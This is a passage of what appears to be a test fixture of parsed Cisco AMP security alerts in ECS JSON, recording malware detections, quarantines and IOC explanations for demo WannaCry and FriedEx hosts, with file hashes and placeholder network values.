"related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854055298Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419179213462438000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": 
"Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419179204872503299", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854057182Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419179209167471000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419179209167470602", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854059068Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419179209167471000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419179209167470598", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha1": 
"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854060930Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419179209167471000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419179209167470601", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "mssecsvc.exe", + "pid": 3020, + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + 
"md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "@timestamp": "2021-01-14T11:26:35.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854062787Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419179209167471000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + 
"test_group_guid" + ], + "detection_id": "6419179204872503300", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "services.exe", + "pid": 480, + "hash": { + "sha1": "ff658a36899e43fec3966d608b4aa4472de7a378", + "sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "md5": "71c85477df9347fe8e7bc55768473fca" + } + }, + "@timestamp": "2021-01-14T10:59:33.000Z", + "file": { + "name": "mscorsvw.exe", + "path": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe", + "hash": { + "sha1": "c78f4c22dd195a1791472a2c271a0c85b53900d9", + "sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "md5": "75a758a0c5cea48c9922d64a113d0f9d" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "hash": [ + "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "75a758a0c5cea48c9922d64a113d0f9d", + "c78f4c22dd195a1791472a2c271a0c85b53900d9" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_MAP_FriedEx", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_MAP_FriedEx" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854064627Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity 
Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", + "kind": "alert", + "action": "Malicious Activity Detection", + "id": "6583840597369422000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.MAP.Ransomware.rewrite", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "04:e6:4d:d5:7a:b5", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "04:e6:4d:d5:7a:b5" + ] + }, 
+ "group_guids": [ + "test_group_guid" + ], + "detection_id": "6583840593074454529", + "event_type_id": 1090519105 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0" + } + }, + "@timestamp": "2021-01-14T10:59:30.000Z", + "file": { + "name": "vssadmin.exe", + "path": "file:///C%3A/Windows/SysWOW64/vssadmin.exe", + "hash": { + "sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_MAP_FriedEx", + "hostname": "Demo_AMP_MAP_FriedEx" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854066521Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:59:30.000Z", + "action": "Cloud IOC", + "id": "6701398782847286000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "04:e6:4d:d5:7a:b5", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": 
"test_connector_guid", + "related": { + "mac": [ + "04:e6:4d:d5:7a:b5" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536" + } + }, + "@timestamp": "2021-01-14T10:55:07.000Z", + "file": { + "name": "cmd.exe", + "path": "file:///C%3A/Windows/system32/cmd.exe", + "hash": { + "sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "hash": [ + "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_MAP_FriedEx", + "hostname": "Demo_AMP_MAP_FriedEx" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854068405Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:55:07.000Z", + "action": "Cloud IOC", + "id": "7007136036637603000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "04:e6:4d:d5:7a:b5", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "04:e6:4d:d5:7a:b5" + ] + 
}, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PowershellEncodedBuffer.ioc", + "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff" + } + }, + "@timestamp": "2021-01-14T10:47:17.000Z", + "file": { + "name": "powershell.exe", + "path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "hash": { + "sha256": 